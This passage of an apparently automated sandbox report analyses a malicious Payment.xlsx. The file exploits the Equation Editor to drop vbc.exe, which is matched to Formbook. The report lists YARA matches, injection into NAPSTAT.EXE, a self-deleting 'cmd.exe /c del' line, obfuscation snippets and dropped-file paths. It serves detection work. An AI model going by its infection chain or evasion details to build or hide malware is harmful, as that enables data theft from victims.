Source: C:\Users\Public\vbc.exe Code function: 7_2_00B5905A 7_2_00B5905A
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B43040 7_2_00B43040
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B3E2E9 7_2_00B3E2E9
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BE1238 7_2_00BE1238
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B663DB 7_2_00B663DB
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B3F3CF 7_2_00B3F3CF
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B42305 7_2_00B42305
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8A37B 7_2_00B8A37B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B47353 7_2_00B47353
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B75485 7_2_00B75485
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B51489 7_2_00B51489
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B7D47D 7_2_00B7D47D
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B5C5F0 7_2_00B5C5F0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B4351F 7_2_00B4351F
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B86540 7_2_00B86540
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B44680 7_2_00B44680
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B4E6C1 7_2_00B4E6C1
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BE2622 7_2_00BE2622
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B4C7BC 7_2_00B4C7BC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BC579A 7_2_00BC579A
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B757C3 7_2_00B757C3
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BDF8EE 7_2_00BDF8EE
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B6286D 7_2_00B6286D
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B4C85C 7_2_00B4C85C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B429B2 7_2_00B429B2
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BE098E 7_2_00BE098E
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B569FE 7_2_00B569FE
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BC5955 7_2_00BC5955
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BF3A83 7_2_00BF3A83
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BECBA4 7_2_00BECBA4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B3FBD7 7_2_00B3FBD7
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BCDBDA 7_2_00BCDBDA
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B67B00 7_2_00B67B00
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BDFDDD 7_2_00BDFDDD
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B70D3B 7_2_00B70D3B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B4CD5B 7_2_00B4CD5B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B72E2F 7_2_00B72E2F
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B5EE4C 7_2_00B5EE4C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B50F3F 7_2_00B50F3F
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B6DF7C 7_2_00B6DF7C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020A1238 9_2_020A1238
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02002305 9_2_02002305
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FFE0C6 9_2_01FFE0C6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02007353 9_2_02007353
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0204A37B 9_2_0204A37B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020263DB 9_2_020263DB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0202D005 9_2_0202D005
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FFF3CF 9_2_01FFF3CF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02003040 9_2_02003040
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0201905A 9_2_0201905A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FFE2E9 9_2_01FFE2E9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020A2622 9_2_020A2622
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0204A634 9_2_0204A634
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02004680 9_2_02004680
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0200E6C1 9_2_0200E6C1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0208579A 9_2_0208579A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0200C7BC 9_2_0200C7BC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020357C3 9_2_020357C3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0203D47D 9_2_0203D47D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02035485 9_2_02035485
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02011489 9_2_02011489
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0200351F 9_2_0200351F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02046540 9_2_02046540
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0201C5F0 9_2_0201C5F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B3A83 9_2_020B3A83
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02027B00 9_2_02027B00
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020ACBA4 9_2_020ACBA4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0208DBDA 9_2_0208DBDA
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FFFBD7 9_2_01FFFBD7
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0200C85C 9_2_0200C85C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0202286D 9_2_0202286D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0209F8EE 9_2_0209F8EE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02085955 9_2_02085955
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020A098E 9_2_020A098E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020029B2 9_2_020029B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020169FE 9_2_020169FE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02032E2F 9_2_02032E2F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0201EE4C 9_2_0201EE4C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02010F3F 9_2_02010F3F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0202DF7C 9_2_0202DF7C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02030D3B 9_2_02030D3B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0200CD5B 9_2_0200CD5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0209FDDD 9_2_0209FDDD
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009C5ED 9_2_0009C5ED
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009B944 9_2_0009B944
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009BB84 9_2_0009BB84
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00088C4B 9_2_00088C4B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00088C50 9_2_00088C50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009BCF5 9_2_0009BCF5
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00082D90 9_2_00082D90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00082FB0 9_2_00082FB0
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Payment.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 00B83F92 appears 108 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00BAF970 appears 81 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00B8373B appears 238 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00B3DF5C appears 118 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00B3E2A8 appears 38 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 01FFDF5C appears 118 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 0204373B appears 238 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 02043F92 appears 108 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 0206F970 appears 81 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 01FFE2A8 appears 38 times
PE file contains executable resources (Code or Archives)
Source: so[1].exe.2.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Yara signature match
Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: so[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@14/8@7/7
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Payment.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF288.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: Payment.xlsx Virustotal: Detection: 18%
Source: Payment.xlsx ReversingLabs: Detection: 10%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: Payment.xlsx Static file information: File size 1363456 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
Source: Binary string: napstat.pdb source: vbc.exe, 00000007.00000003.2227630571.00000000007DE000.00000004.00000001.sdmp
Source: Payment.xlsx Initial sample: OLE indicators vbamacros = False
Source: Payment.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0039C4C8 pushfd ; retn 0030h 4_2_0039C4C9
Source: C:\Users\Public\vbc.exe Code function: 4_2_0039C588 push eax; ret 4_2_0039C589
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E5748 push eax; retn 007Fh 4_2_007E5751
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E6FC8 pushfd ; retf 4_2_007E6FC9
Source: C:\Users\Public\vbc.exe Code function: 7_2_00415AFB push eax; iretd 7_2_00415B02
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B3F2 push eax; ret 7_2_0041B3F8
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B3FB push eax; ret 7_2_0041B462
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B3A5 push eax; ret 7_2_0041B3F8
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B45C push eax; ret 7_2_0041B462
Source: C:\Users\Public\vbc.exe Code function: 7_2_00414E3F push edx; retf 7_2_00414E4D
Source: C:\Users\Public\vbc.exe Code function: 7_2_00415FF0 push es; iretd 7_2_00415FF1
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B3DFA1 push ecx; ret 7_2_00B3DFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FFDFA1 push ecx; ret 9_2_01FFDFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009B3A5 push eax; ret 9_2_0009B3F8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009B3FB push eax; ret 9_2_0009B462
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009B3F2 push eax; ret 9_2_0009B3F8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009B45C push eax; ret 9_2_0009B462
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00095AFB push eax; iretd 9_2_00095B02
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00094E3F push edx; retf 9_2_00094E4D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00095FF0 push es; iretd 9_2_00095FF1
Source: initial sample Static PE information: section name: .text entropy: 7.63788106715

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
